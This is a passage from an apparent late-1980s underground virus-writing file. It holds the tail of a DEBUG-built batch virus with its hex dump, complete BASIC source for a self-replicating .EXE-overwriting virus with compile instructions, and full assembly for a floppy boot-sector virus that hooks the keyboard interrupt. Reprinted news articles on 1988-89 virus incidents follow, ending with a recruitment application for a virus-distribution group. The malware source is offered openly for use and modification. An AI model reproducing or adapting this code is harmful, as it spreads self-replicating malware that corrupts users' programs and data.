e112 "COPY \VR.BAT" ( COPY command is now placed in front of file)
e12b od,0a (COPY command terminated with carriage return + lf)
rxc ( The CX register is ... )
2c ( set to 2CH)
nname.bat ( Name it NAME.BAT)
w ( Write )
q ( quit )
The third command file must be printed as a hex dump because it contains
2 control characters (1Ah=Control Z) and this is not entirely printable.
Hex dump of the third command file:
-----------------------------------
Name: 3
0100 31 2C 31 3F 52 20 1A 0D-6E 79 79 79 79 79 79 79
1 , 1 ? . . n y y y y y y y
0110 79 29 0D 32 2C 32 3F 52-20 1A OD 6E 6E 79 79 79
y . 2 , ? ? r . . n n y y y
0120 79 79 79 79 29 0D 45 0D-00 00 00 00 00 00 00 00
y y y y . E . . . . . . . . .
In order for this virus to work VR.BAT should be in the root. This program
only affects .COM files.
[2.8]
Viruses in Basic
----------------
Basic is great language and often people think of it as a limited language
and will not be of any use in creating something like a virus. Well you are
really wrong. Lets take a look at a Basic Virus created by R. Burger in 1987.
This program is an overwritting virus and uses (Shell) MS-DOS to infect .EXE
files.To do this you must compile the source code using a the Microsoft
Quick-BASIC.Note the lenght of the compiled and the linked .EXE file and edit
the source code to place the lenght of the object program in the LENGHTVIR
variable. BV3.EXE should be in the current directory, COMMAND.COM must be
available, the LENGHTVIR variable must be set to the lenght of the linked
program and remember to use /e parameter when compiling.
10 REM ** DEMO
20 REM ** MODIFY IT YOUR OWN WAY IF DESIRED **
30 REM ** BASIC DOESNT SUCK
40 REM ** NO KIDDING
50 ON ERROR GOTO 670
60 REM *** LENGHTVIR MUST BE SET **
70 REM *** TO THE LENGHT TO THE **
80 REM *** LINKED PROGRAM ***
90 LENGHTVIR=2641
100 VIRROOT$="BV3.EXE"
110 REM *** WRITE THE DIRECTORY IN THE FILE "INH"
130 SHELL "DIR *.EXE>INH"
140 REM ** OPEN "INH" FILE AND READ NAMES **
150 OPEN "R",1,"INH",32000
160 GET #1,1
170 LINE INPUT#1,ORIGINAL$
180 LINE INPUT#1,ORIGINAL$
190 LINE INPUT#1,ORIGINAL$
200 LINE INPUT#1,ORIGINAL$
210 ON ERROR GOT 670
220 CLOSE#2
230 F=1:LINE INPUT#1,ORIGINAL$
240 REM ** "%" IS THE MARKER OF THE BV3
250 REM ** "%" IN THE NAME MEANS
260 REM ** INFECTED COPY PRESENT
270 IF MID$(ORIGINAL$,1,1)="%" THEN GOTO 210
280 ORIGINAL$=MID$(ORIGINAL$,1,13)
290 EXTENSIONS$=MID$(ORIGINAL,9,13)
300 MID$(EXTENSIONS$,1,1)="."
310 REM *** CONCATENATE NAMES INTO FILENAMES **
320 F=F+1
330 IF MID$(ORIGINAL$,F,1)=" " OR MID$ (ORIGINAL$,F,1)="." OR F=13 THEN
GOTO 350
340 GOTO 320
350 ORIGINAL$=MID$(ORIGINAL$,1,F-1)+EXTENSION$
360 ON ERROR GOTO 210
365 TEST$=""
370 REM ++ OPEN FILE FOUND +++
380 OPEN "R",2,OROGINAL$,LENGHTVIR
390 IF LOF(2) < LENGHTVIR THEN GOTO 420
400 GET #2,2
410 LINE INPUT#1,TEST$
420 CLOSE#2
431 REM ++ CHECK IF PROGRAM IS ILL ++
440 REM ++ "%" AT THE END OF THE FILE MEANS..
450 REM ++ FILE IS ALREADY SICK ++
460 REM IF MID$(TEST,2,1)="%" THEN GOTO 210
470 CLOSE#1
480 ORIGINALS$=ORIGINAL$
490 MID$(ORIGINALS$,1,1)="%"
499 REM ++++ SANE "HEALTHY" PROGRAM ++++
510 C$="COPY "+ORIGINAL$+" "+ORIGINALS$
520 SHELL C$
530 REM *** COPY VIRUS TO HEALTHY PROGRAM ****
540 C$="COPY "+VIRROOT$+ORIGINAL$
550 SHELL C$
560 REM *** APPEND VIRUS MARKER ***
570 OPEN ORIGINAL$ FOR APPEND AS #1 LEN=13
580 WRITE#1,ORIGINALS$
590 CLOSE#1
630 REM ++ OUYPUT MESSAGE ++
640 PRINT "INFECTION IN " ;ORIGIANAL$; " !! BE WARE !!"
650 SYSTEM
660 REM ** VIRUS ERROR MESSAGE
670 PRINT "VIRUS INTERNAL ERROR GOTTCHA !!!!":SYSTEM
680 END
This basic virus will only attack .EXE files. After the execution you will
see a "INH" file which contains the directory, and the file %SORT.EXE.
Programs which start with "%" are NOT infected ,they pose as back up copies.
;[2.9]
;-----------------------------------------------------------------------;
; This virus is of the "FLOPPY ONLY" variety. ;
; It replicates to the boot sector of a floppy disk and when it gains control
; it will move itself to upper memory. It redirects the keyboard ;
; interrupt (INT 09H) to look for ALT-CTRL-DEL sequences at which time ;
; it will attempt to infect any floppy it finds in drive A:. ;
; It keeps the real boot sector at track 39, sector 8, head 0 ;
; It does not map this sector bad in the fat (unlike the Pakistani Brain)
; and should that area be used by a file, the virus ;
; will die. It also contains no anti detection mechanisms as does the ;
; BRAIN virus. It apparently uses head 0, sector 8 and not head 1 ;
; sector 9 because this is common to all floppy formats both single ;
; sided and double sided. It does not contain any malevolent TROJAN ;
; HORSE code. It does appear to contain a count of how many times it ;
; has infected other diskettes although this is harmless and the count ;
; is never accessed. ;
; ;
; Things to note about this virus: ;
; It can not only live through an ALT-CTRL-DEL reboot command, but this ;
; is its primary (only for that matter) means of reproduction to other ;
; floppy diskettes. The only way to remove it from an infected system ;
; is to turn the machine off and reboot an uninfected copy of DOS. ;
; It is even resident when no floppy is booted but BASIC is loaded ;
; instead. Then when ALT-CTRL-DEL is pressed from inside of BASIC, ;
; it activates and infectes the floppy from which the user is ;
; attempting to boot. ;
; ;
; Also note that because of the POP CS command to pass control to ;
; its self in upper memory, this virus does not to work on 80286 ;
; machines (because this is not a valid 80286 instruction). ;
; ;
; If your assembler will not allow the POP CS command to execute, replace;
; the POP CS command with an NOP and then assemble it, then debug that ;
; part of the code and place POP CS in place of NOP at that section. ;
; ;
; The Norton Utilities can be used to identify infected diskettes by ;
; looking at the boot sector and the DOS SYS utility can be used to ;
; remove it (unlike the Pakistani Brain). ;
;-----------------------------------------------------------------------;
;
ORG 7C00H ;
;
TOS LABEL WORD ;TOP OF STACK
;-----------------------------------------------------------------------;
; 1. Find top of memory and copy ourself up there. (keeping same offset);
; 2. Save a copy of the first 32 interrupt vectors to top of memory too ;
; 3. Redirect int 9 (keyboard) to ourself in top of memory ;
; 4. Jump to ourself at top of memory ;
; 5. Load and execute REAL boot sector from track 40, head 0, sector 8 ;
;-----------------------------------------------------------------------;
BEGIN: CLI ;INITIALIZE STACK
XOR AX,AX ;
MOV SS,AX ;
MOV SP,offset TOS ;
STI ;
;
MOV BX,0040H ;ES = TOP OF MEMORY - (7C00H+512)
MOV DS,BX ;
MOV AX,[0013H] ;
MUL BX ;
SUB AX,07E0H ; (7C00H+512)/16
MOV ES,AX ;
;
PUSH CS ;DS = CS
POP DS ;
;
CMP DI,3456H ;IF THE VIRUS IS REBOOTING...
JNE B_10 ;
DEC Word Ptr [COUNTER_1] ;...LOW&HI:COUNTER_1--
;
B_10: MOV SI,SP ;SP=7C00 ;COPY SELF TO TOP OF MEMORY
MOV DI,SI ;
MOV CX,512 ;
CLD ;
REP MOVSB ;
;
MOV SI,CX ;CX=0 ;SAVE FIRST 32 INT VETOR ADDRESSES TO
MOV DI,offset BEGIN - 128 ; 128 BYTES BELOW OUR HI CODE
MOV CX,128 ;
REP MOVSB ;
;
CALL PUT_NEW_09 ;SAVE/REDIRECT INT 9 (KEYBOARD)
;
PUSH ES ;ES=HI ; JUMP TO OUR HI CODE WITH
POP CS
;
PUSH DS ;DS=0 ; ES = DS
POP ES ;
;
MOV BX,SP ; SP=7C00 ;LOAD REAL BOOT SECTOR TO 0000:7C00
MOV DX,CX ;CX=0 ;DRIVE A: HEAD 0
MOV CX,2708H ; TRACK 40, SECTOR 8
MOV AX,0201H ; READ SECTOR
INT 13H ; (common to 8/9 sect. 1/2 sided!)
JB $ ; HANG IF ERROR
;
JMP JMP_BOOT ;JMP 0000:7C00
;
;-----------------------------------------------------------------------;
; SAVE THEN REDIRECT INT 9 VECTOR ;
; ;
; ON ENTRY: DS = 0 ;
; ES = WHERE TO SAVE OLD_09 & (HI) ;
; WHERE NEW_09 IS (HI) ;
;-----------------------------------------------------------------------;
PUT_NEW_09: ;
DEC Word Ptr [0413H] ;TOP OF MEMORY (0040:0013) -= 1024
;
MOV SI,9*4 ;COPY INT 9 VECTOR TO
MOV DI,offset OLD_09 ; OLD_09 (IN OUR HI CODE!)
MOV CX,0004 ;
;
CLI ;
REP MOVSB ;
MOV Word Ptr [9*4],offset NEW_09
MOV [(9*4)+2],ES ;
STI ;
;
RET ;
;
;-----------------------------------------------------------------------;
; RESET KEYBOARD, TO ACKNOWLEDGE LAST CHAR ;
;-----------------------------------------------------------------------;
ACK_KEYBD: ;
IN AL,61H ;RESET KEYBOARD THEN CONTINUE
MOV AH,AL ;
OR AL,80H ;
OUT 61H,AL ;
XCHG AL,AH ;
OUT 61H,AL ;
JMP RBOOT ;
;
;-----------------------------------------------------------------------;
; DATA AREA WHICH IS NOT USED IN THIS VERSION ;
; REASON UNKNOWN ;
;-----------------------------------------------------------------------;
TABLE DB 27H,0,1,2 ;FORMAT INFORMATION FOR TRACK 39
DB 27H,0,2,2 ; (CURRENTLY NOT USED)
DB 27H,0,3,2 ;
DB 27H,0,4,2 ;
DB 27H,0,5,2 ;
DB 27H,0,6,2 ;
DB 27H,0,7,2 ;
DB 27H,0,8,2 ;
;
;A7C9A LABEL BYTE ;
DW 00024H ;NOT USED
DB 0ADH ;
DB 07CH ;
DB 0A3H ;
DW 00026H ;
;
;L7CA1: ;
POP CX ;NOT USED
POP DI ;
POP SI ;
POP ES ;
POP DS ;
POP AX ;
POPF ;
JMP 1111:1111 ;
;
;-----------------------------------------------------------------------;
; IF ALT & CTRL & DEL THEN ... ;
; IF ALT & CTRL & ? THEN ... ;
;-----------------------------------------------------------------------;
NEW_09: PUSHF ;
STI ;
;
PUSH AX ;
PUSH BX ;
PUSH DS ;
;
PUSH CS ;DS=CS
POP DS ;
;
MOV BX,[ALT_CTRL W] ;BX=SCAN CODE LAST TIME
IN AL,60H ;GET SCAN CODE
MOV AH,AL ;SAVE IN AH
AND AX,887FH ;STRIP 8th BIT IN AL, KEEP 8th BIT AH
;
CMP AL,1DH ;IS IT A [CTRL]...
JNE N09_10 ;...JUMP IF NO
MOV BL,AH ;(BL=08 ON KEY DOWN, BL=88 ON KEY UP)
JMP N09_30 ;
;
N09_10: CMP AL,38H ;IS IT AN [ALT]...
JNE N09_20 ;...JUMP IF NO
MOV BH,AH ;(BH=08 ON KEY DOWN, BH=88 ON KEY UP)
JMP N09_30 ;
;
N09_20: CMP BX,0808H ;IF (CTRL DOWN & ALT DOWN)...
JNE N09_30 ;...JUMP IF NO
;
CMP AL,17H ;IF [I]...
JE N09_X0 ;...JUMP IF YES
CMP AL,53H ;IF [DEL]...
JE ACK_KEYBD ;...JUMP IF YES
;
N09_30: MOV [ALT_CTRL],BX ;SAVE SCAN CODE FOR NEXT TIME
;
N09_90: POP DS ;
POP BX ;
POP AX ;
POPF ;
;
DB 0EAH ;JMP F000:E987
OLD_09 DW ? ;
DW 0F000H ;
;
N09_X0: JMP N09_X1 ;
;
;-----------------------------------------------------------------------;
; ;
;-----------------------------------------------------------------------;
RBOOT: MOV DX,03D8H ;DISABLE COLOR VIDEO !?!?
MOV AX,0800H ;AL=0, AH=DELAY ARG
OUT DX,AL ;
CALL DELAY ;
MOV [ALT_CTRL],AX ;AX=0 ;
;
MOV AL,3 ;AH=0 ;SELECT 80x25 COLOR
INT 10H ;
MOV AH,2 ;SET CURSOR POS 0,0
XOR DX,DX ;
MOV BH,DH ; PAGE 0
INT 10H ;
;
MOV AH,1 ;SET CURSOR TYPE
MOV CX,0607H ;
INT 10H ;
;
MOV AX,0420H ;DELAY (AL=20H FOR EOI BELOW)
CALL DELAY ;
;
CLI ;
OUT 20H,AL ;SEND EOI TO INT CONTROLLER
;
MOV ES,CX ;CX=0 (DELAY) ;RESTORE FIRST 32 INT VECTORS
MOV DI,CX ; (REMOVING OUR INT 09 HANDLER!)
MOV SI,offset BEGIN - 128 ;
MOV CX,128 ;
CLD ;
REP MOVSB ;
;
MOV DS,CX ;CX=0 ;DS=0
;
MOV Word Ptr [19H*4],offset NEW_19 ;SET INT 19 VECTOR
MOV [(19H*4)+2],CS ;
;
MOV AX,0040H ;DS = ROM DATA AREA
MOV DS,AX ;
;
MOV [0017H],AH ;AH=0 ;KBFLAG (SHIFT STATES) = 0
INC Word Ptr [0013H] ;MEMORY SIZE += 1024 (WERE NOT ACTIVE)
;
PUSH DS ;IF BIOS F000:E502 == 21E4...
MOV AX,0F000H ;
MOV DS,AX ;
CMP Word Ptr [0E502H],21E4H ;
POP DS ;
JE R_90 ;
INT 19H ; IF NOT...REBOOT
;
R_90: JMP 0F000:0E502H ;...DO IT ?!?!?!
;
;-----------------------------------------------------------------------;
; REBOOT INT VECTOR ;
;-----------------------------------------------------------------------;
NEW_19: XOR AX,AX ;
;
MOV DS,AX ;DS=0
MOV AX,[0410] ;AX=EQUIP FLAG
TEST AL,1 ;IF FLOPPY DRIVES ...
JNZ N19_20 ;...JUMP
N19_10: PUSH CS ;ELSE ES=CS
POP ES ;
CALL PUT_NEW_09 ;SAVE/REDIRECT INT 9 (KEYBOARD)
INT 18H ;LOAD BASIC
;
N19_20: MOV CX,0004 ;RETRY COUNT = 4
;
N19_22: PUSH CX ;
MOV AH,00 ;RESET DISK
INT 13 ;
JB N19_81 ;
MOV AX,0201 ;READ BOOT SECTOR
PUSH DS ;
POP ES ;
MOV BX,offset BEGIN ;
MOV CX,1 ;TRACK 0, SECTOR 1
INT 13H ;
N19_81: POP CX ;
JNB N19_90 ;
LOOP N19_22 ;
JMP N19_10 ;IF RETRY EXPIRED...LOAD BASIC
;
;-----------------------------------------------------------------------;
; Reinfection segment. ;
;-----------------------------------------------------------------------;
N19_90: CMP DI,3456 ;IF NOT FLAG SET...
JNZ RE_INFECT ;...RE INFECT
;
JMP_BOOT: ;PASS CONTROL TO BOOT SECTOR
JMP 0000:7C00H ;
;
;-----------------------------------------------------------------------;
; Reinfection Segment. ;
;-----------------------------------------------------------------------;
RE_INFECT: ;
MOV SI,offset BEGIN ;COMPARE BOOT SECTOR JUST LOADED WITH
MOV CX,00E6H ; OURSELF
MOV DI,SI ;
PUSH CS ;
POP ES ;
CLD ;
REPE CMPSB ;
JE RI_12 ;IF NOT EQUAL...
;
INC Word Ptr ES:[COUNTER_1] ;INC. COUNTER IN OUR CODE (NOT DS!)
;
;MAKE SURE TRACK 39, HEAD 0 FORMATTED ;
MOV BX,offset TABLE ;FORMAT INFO
MOV DX,0000 ;DRIVE A: HEAD 0
MOV CH,40-1 ;TRACK 39
MOV AH,5 ;FORMAT
JMP RI_10 ;REMOVE THE FORMAT OPTION FOR NOW !
;
; <<< NO EXECUTION PATH TO HERE >>> ;
JB RI_80 ;
;
;WRITE REAL BOOT SECTOR AT TRACK 39, SECTOR 8, HEAD 0
RI_10: MOV ES,DX ;ES:BX = 0000:7C00, HEAD=0
MOV BX,offset BEGIN ;TRACK 40H
MOV CL,8 ;SECTOR 8
MOV AX,0301H ;WRITE 1 SECTOR
INT 13H ;
;
PUSH CS ; (ES=CS FOR PUT_NEW_09 BELOW)
POP ES ;
JB RI_80 ;IF WRITE ERROR...JUMP TO BOOT CODE
;
MOV CX,0001 ;WRITE INFECTED BOOT SECTOR !
MOV AX,0301 ;
INT 13H ;
JB RI_80 ; IF ERROR...JUMP TO BOOT CODE
;
RI_12: MOV DI,3456H ;SET "JUST INFECTED ANOTHER ONE"...
INT 19H ;...FLAG AND REBOOT
;
RI_80: CALL PUT_NEW_09 ;SAVE/REDIRECT INT 9 (KEYBOARD)
DEC Word Ptr ES:[COUNTER_1] ; (DEC. CAUSE DIDNT INFECT)
JMP JMP_BOOT ;
;
;-----------------------------------------------------------------------;
; ;
;-----------------------------------------------------------------------;
N09_X1: MOV [ALT_CTRL],BX ;SAVE ALT & CTRL STATUS
;
MOV AX,[COUNTER_1] ;PUT COUNTER_1 INTO RESET FLAG
MOV BX,0040H ;
MOV DS,BX ;
MOV [0072H],AX ; 0040:0072 = RESET FLAG
JMP N09_90 ;
;
;-----------------------------------------------------------------------;
; DELAY ;
; ;
; ON ENTRY AH:CX = LOOP COUNT ;
;-----------------------------------------------------------------------;
DELAY: SUB CX,CX ;
D_01: LOOP $ ;
SUB AH,1 ;
JNZ D_01 ;
RET ;
;
;-----------------------------------------------------------------------;
; ;
;-----------------------------------------------------------------------;
A7DF4 DB 27H,00H,8,2
COUNTER_1 DW 001CH
ALT_CTRL DW 0
A7DFC DB 27H,0,8,2
[2.10]
Virili In The News
------------------
This section deals with a large amount of stuff, basically, a bunch
of viruses and stuff that have been in the newspapers and magazines cuz
all of the damage they have done. Enjoy....
There's A Virus In My Software
Mischief-makers at the computer
are deliberately endangering data
By Philip J. Hilts
Washington Post Staff Writer
The Washington Post Weekly Edition, Page #38. May 23-29, 1988.
Tiny programs that are deliberately cause mischief are epidemic among
computers and causing nervousness among those who monitor them. Since the
first tests of the notion in 1983 that machines can catch and spread
"information diseases," the computer world has reached the point at which as
many as thirty instances of "computer virus" have been reported in the past
year, affecting tens of thousands of U.S. computers alone.
Such viruses have been found at the National Aeronautics and Space
Administration, International Business Machines Corporation, the House of
Representatives, at least six universities, several major computer networks
such as Comp-u-serve and several businesses, including the world's largest
computer-service company, the $4.4 billion Electronic Data Systems
Corporation of Dallas, Texas.
Written by malicious programmers, the viruses are sneaked into computer
systems by piggybacking them on legitimate programs and messages. There,
they may be passed along or instructed to wait until a prearranged moment to
burst forth and destroy data.
Hundreds of computers at the Hebrew University of Jerusalem and other
places in Israel were hit last fall by a virus designed to spread and then,
in one swipe on a Friday the thirteenth, destroy all data in any computer it
could reach.
If not for an error by it's author, who has not been caught, the virus
could have caused devastation among micro-computers in Israel and other
nations. The virus did not check to see whether it already had infected a
program and so infected some computers hundreds of times, crowding their
memories enough to call attention to itself.
In a seven-month campaign, programmers in Israel hastened to find
infected machines and ensure that the smallest number would be affected
before Friday, May 13th. Officials say they initially thought that the
infection was connected with the anniversary of the last day that Palestine
existed as a political entity but subsequently decided that it most likely
involved just Friday the thirteenth.
Apparently, the campaign was successful; there has been no word of
substantial damage. This past Friday the thirteenth is this year's only such
day.
At the Aldus Corporation of Seattle, Washington, a major software maker,
executives are huddling with lawyers to try to determine whether
international spread of such diseases is illegal. No virus cases have been
taken to court.
At N.A.S.A. headquarters in Washington, several hundred computers had to
be resuscitated after being infected. N.A.S.A. officials have taken
precautions and reminded their machines' users to follow routine computer
hygiene: Don't trust foreign data or strange machines.
Viruses have the eerie ability to perch disguised among legitimate data
just as biological viruses hide among genes in human cells, then spring out
unexpectedly, multiplying and causing damage. Experts say that even when
they try to study viruses in controlled conditions, the programs can get out
of control and erase everything in a computer. The viruses can be virtually
impossible to stop if their creators are determined enough.
"The only way to protect every-body from them is to do something much
worse than the viruses: Stop talking to one another with computers," says
William H. Murray, an information-security specialist at Ernst and Whinney
financial consultants in Hartford, Connecticut.
Hundreds of programs and files have been destroyed by viruses, and
thousands of hours of repair or prevention time have been logged.
Programmers have quickly produced antidote programs with such titles as
"Vaccine," "Flu Shot," "Data Physician," "Syringe."
Experts says known damage is minimal compared with the huge, destructive
potential. They express the hope that the attacks will persuade computer
users to minimize access to programming and data.
"What we are dealing with here is the fabric of trust in society," says
Murray. "With computer viruses, we have a big vulnerability."
Early this year, Aldus Corporation discovered that a virus had been
introduced that infected at least five-thousand copies of a new drawing
program called Freehand for the Macintosh computer. The infected copies were
packaged, sent to stores and sold. On March 2, the virus interrupted users
by flashing this message on their screens:
"Richard Brandow, publisher of MacMag, and its entire staff would like
to take this opportunity to convey their universal message of peace to all
Macintosh users around the world."
Viruses are the newest of evolving methods of computer mayhem, says
Donn B. Parker, a consultant at SRI International, a computer research firm
in Menlo Park, California. One is the "Trojan horse," a program that looks
and acts like a normal program but contains hidden commands that eventually
take effect, ordering mischief. Others include the "time bomb," which
explodes at a set time, and the "logic bomb," which goes off when the
computer arrives at a certain result during normal computation. The "salami
attack" executes barely noticeable results small acts, such as shaving a
penny from thousands of accounts.
The computer virus has the capability to command the computer to make
copies of the virus and spread them. A virus typically is written only as a
few hundred characters in a program containing tens of thousands of
characters. When the computer reads legitimate instructions, it encounters
the virus, which instructs the computer to suspend normal operations for a
fraction of a second.
During that time, the virus instructs the computer to check for other
copies of itself and, if none is found, to make and hide copies. Instruction
to commit damage may be included. A few infamous viruses found in the past
year include:
[] The "scores" virus. Named after a file it spawns, it recently entered
several hundred Macintosh computers at N.A.S.A. headquarters. "It looks
as if it searching for a particular Macintosh program with a name that
no one recognizes," spokesman Charles Redmond says.
This virus, still spreading, has reached computers in Congress'
information system at the National Oceanic and Atmospheric
Administration and at Apple Computer Incorporated's government-systems
office in Reston, Virginia. It has hit individuals, businesses and
computer "bulletin boards" where computer hobbyists share information.
It apparently originated in Dallas, Texas and has caused damage, but
seemingly only because of its clumsiness, not an instruction to do
damage.
[] The "brain" virus. Named by its authors, it was written by two brothers
in a computer store in Lahore, Pakistan, who put their names, addresses
and phone number in the virus. Like "scores," it has caused damage
inadvertently, ordering the computer to copy itself into space that
already contain information.
[] The "Christmas" virus. It struck last December after a West German
student sent friends a Christmas message through a local computer
network. The virus told the receiver's computer to display the
greeting, then secretly send the virus and message to everyone on the
recipient's regular electronic mailing list.
The student apparently had no idea that someone on the list had
special, restricted access to a major world-wide network of several
thousand computers run by I.B.M. The network broke down within hours
when the message began multiplying, stuffing the computers' memories.
No permanent damage was done, and I.B.M. says it has made repetition
impossible.
Demonstrations have shown that viruses can invade the screens of users
with the highest security classification, according to Fred Cohen of
Cincinnati, a researcher who coined the term "computer Viruses." A standard
computer-protection device at intelligence agencies, he says, denies giving
access by a person at one security level to files of anyone else at a higher
level and allows reading but denies writing of files of anyone lower.
This, however, "allows the least trusted user to write a program that
can be used by everyone" and is "very dangerous," he says.
Computers "are all at risk," says Cohen, "and will continue to be... not
just from computer viruses. But the viruses represent a new level of threat
because of their subtleness and persistence."
1.) Computer "viruses" are actually immature computer programs. Most are
written by malicious programmers intent on destroying information in
computers for fun.
2.) Those who write virus programs often conceal them on floppy disks that
are inserted in the computer. The disks contain all programs needed to
run the machine, such as word processing programs, drawing programs or
spread sheet programs.
3.) A malicious programmer makes the disk available to others, saying it
contains a useful program or game. These programs can be lent to others
or put onto computerized: "bulletin boards" where anyone can copy them
for personal use.
4.) A computer receiving the programs will "read" the disk and the tiny virus
program at the same time. The virus may then order the computer to do a
number of things:
A.) Tell it to read the virus and follow instructions.
B.) Tell it to make a copy of the virus and place it on any disk inserted
in the machine today.
C.) Tell it to check the computer's clock, and on a certain date destroy
information that tells it where data is stored on any disk: if an
operator has no way of retrieving information, it is destroyed.
D.) Tell it not to list the virus programs when the computer is asked for
an index of programs.
5.) In this way, the computer will copy the virus onto many disks--perhaps
all or nearly all the disks used in the infected machine. The virus may
also be passed over the telephone, when one computer sends or receives
data from another.
6.) Ultimately hundreds or thousands of people may have infected disks and
potential time bombs in their systems.
-----------------------------------------------
'Virus' infected hospital computers,
led to epidemic of software mix-ups
-----------------------------------------------
From the San Diego Tribune
March 23, 1989
BOSTON (UPI) -- A "virus" infected computers at three Michigan hospitals
last fall and disrupted patient diagnoses at two of the centers in what appears
to be the first such invasion of a medical computer, it was reported yesterday.
The infiltration did not harm any patients but delayed diagnoses by
shutting down computers, creating files of non-existent patients and garbling
names on patient records, which could have caused more serious problems, a
doctor said.
"It definitely did affect care in delaying things and it could have
affected care in terms of losing this information completely," said Dr. Jack
Juni, a staff physician at the William Beaumont Hospitals in Troy and Royal Oak,
Mich., two of the hospitals involved.
If patient information had been lost, the virus could have forced doctors
to repeat tests that involve exposing patients to radiation, Juni said
yesterday. The phony and garble files could have caused a mix-up in patient
diagnosis, he said.
"This was information we were using to base diagnoses on," said Juni, who
reported the case in a letter in The New England Journal of Medicine. "We were
lucky and caught it in time."
A computer virus is a set of instructions designed to reproduce and spread
from computer to computer. Some viruses do damage in the process, such as
destroying files or overloading computers.
Paul Pomes, a computer virus expert at the University of Illinois in
Champaign, said this was the first case he had heard of in which a virus had
disrupted a computer used for patient care or diagnosis in a hospital.
Such disruptions could become more common as personal computers are used
more widely in hospitals, Juni and Pomes said. More people know how to program
-- and therefore sabotage -- personal computers than the more specialized
computers that previously have been used, Pomes said.
The problem in Michigan surfaced when a computer used to display images
used to diagnose cancer and other diseases began to malfunction at the 250-bed
Troy hospital in August 1988.
In October, Juni discovered a virus in the computer in the Troy hospital.
The next day, Juni found the same virus in a similar computer in the 1,200-bed
Royal Oak facility, he said.
The virus apparently arrived in a program in a storage disk that was part
of the Troy computer system, he said. It probably was spread inadvertently to
the Royal Oak computer on a floppy disk used by a resident who worked at both
hospitals to write a research paper, he said.
The virus also spread to the desk-top computers at the University of
Michigan Medical Center in Ann Arbor, where it was discovered before it caused
problems.
"Prosecutor Wins Conviction In Computer Data Destruction"
September 21, 1988
Fort Worth, Texas (AP) - A former programmer has been convicted of planting
a computer "virus" in his employer's system that wiped out 168,000 records and
was activated like a timb bomb, doing its damage two days after he was fired.
Tarrant County Assistant District Attorney Davis McCown said he believes e
is the first prosecutor in the country to have someone convicted for destroying
computer records using a "virus."
"We've had people stealing through computers, but not this type of case,"
McCown said. "The basis for this offense is deletion."
"It's very rare that the people who spread the viruses are caught," said
John McAfee, chairman of the Computer Virus Industry Association in Santa Clara,
which helps educate the public about viruses and find ways to fight them.
"This is absolutely the first time" for a conviction, McAfee said.
"In the past, prosecutors have stayed away from this kind of case because
they're too hard to prove," McCown said yesterday. They have also been reluctant
because the victim doesn't want to let anyone know there has been a breach of
security."
Donald Gene Burleson, 40, was convicted of charges of harmful access to a
computer, a third-degree feloy that carries up to 10 years in prison and up to
$5,000 in fines.
A key to the case was the fact that State District Judge John Bradshaw
allowed the computer program that deleted the files to be introduced as
evidence, McCown said. It would have been difficult to get a conviction
otherwise, he said.
The District Court jury deliberated six hours before bringing back the
first conviction under the state's 3-year-old computer sabotage law.
Burleson planted the virus in revenge for his firing from an insurance
company, McCown said.
Jurors were told during a technical and sometimes-complicated three-week
trial that Burleson planted a rogue program in the computer system used to store
records at USPA and IRA Co., a Fort Worth-based insurance and brokerage firm.
A virus is a computer program, often hidden in apparently normal computer
software, that instructs the computer to change or destroy information at a
given time or after a certain sequence of commands.
The virus, McCown said, was activated Sept. 21, 1985, two days after
Burleson was fired as a computer programmer, because of alleged personality
conflicts with other employees.
"There were a series of programs built into the system as early as Labor
Day (1985)," McCown said. "Once he got fired, those programs went off."
The virus was discovered two days later, after it had eliminated 168,00
payroll records, holding up company paychecks for more than a month. The virus
could have caused hundreds of thousands of dollars in damage to the system had
it continued, McCown said.
WEST COAST CORRUPTED ALLEGIANCE PRESENTS:
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
>> CORRUPTED PROGRAMMING INTERNATIONAL <<
>> MEMBERSHIP APPLICATION <<
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
(CPI is a sub-group of WCCA)
NOTE: The following information is of a totally confidential nature. We must
question you in depth and thouroughly so that our knowledge and idea
of you will be quite complete. Remember, it is the fate of our voting
members who will decide upon your membership, as the result of your
response to this questionarre. Please answer the following completely
and to the best of your ability. Also note that we may decide to voice
validate you or gather any other information through other sources and
will discover if you have placed false or misleading information on
this application.
PERSONAL INFORMATION:
-----------------------------------------------------------------------------
Alias(es) You HAVE Used :
Alias(es) You Currently Use :
Your FULL REAL Name :
Your Voice Phone Number :(###)###-####
Your Data Phone Number :(###)###-####
Your Mailing Address :
Your City, State & Zip :
Your Age :
Occupation/Grade :
Place of Employment/School :
Work Phone Number :
Your Interests And Hobbies :
Are You IN ANY WAY Affiliated With ANY Governmental/Law Enforcement Agency?
If So, In What Way? (Such as FBI/Sheriff/Police/etc. YOU KNOW WHAT I MEAN)
:
:
Are You IN ANY WAY Affiliated With The Telephone Company Or Any Type Of Phone,
Data, Or Long Distance Type Of Company? If So, In What Way?
:
:
COMPUTER INFORMATION/EXPERIENCE
-----------------------------------------------------------------------------
Computer Experience (time) :
Modeming Experience (time) :
BBS's You Frequent (Name/#) :
Some Elite References :
Computers You Have Used :
Computer(s) You Are Using :
Computer You Prefer :
Languages You Have Tried :
Languages You Know Well :
Your Best Language :
Have You Ever Phreaked :
Do You Phreak Regularly :
Have You Ever Hacked :
Do You Hack Regularly :
Have You Ever Cracked :
Do You Crack Regularly :
Ever Made A Virus/Trojan :
Major Accomplishments :
:
INTERVIEW
-----------------------------------------------------------------------------
Answer In 4 Lines Or Less:
What do you think Corrupted Programming International is?
:
:
:
:
When did you first hear about CPI?
:
:
:
:
Why do you want to be a member of CPI?
:
:
:
:
Do you know any of the members of CPI? Can you name any or the founders of CPI?
:
:
:
:
Have you considered the distribuition of Viruses/Trojans as a "crime"? Why
or why not? Have you ever considered the consequences that could result
from the acts of releasing a Virus/Trojan? (morally speaking?)
:
:
:
:
Have you written any text files? (On any underground type of subject)
:
:
:
:
Are you a member of any other group(s)? Can you name them and their HQ BBS?
:
:
:
:
What would you consider yourself if you were admitted into CPI, a programmer,
a phreaker, a distributor, a information gatherer, or a vegetable?
:
:
:
:
Why would you ever want to release or aid in releasing a potential virus/trojan
to the public?
:
:
:
:
Can you contribute to CPI? How?
:(do you have access to info concerning virus/trojans)
:(exceptional programmer?)
:(got connections?)
:(anything extraordinary?)
OATH
-----------------------------------------------------------------------------
Typing your name at the bottom of the following paragraph is the same as
signing your name on an official document.
authorities - As stated in the document below, the term authorities shall
be defined as any law enforcement agency or any agency that
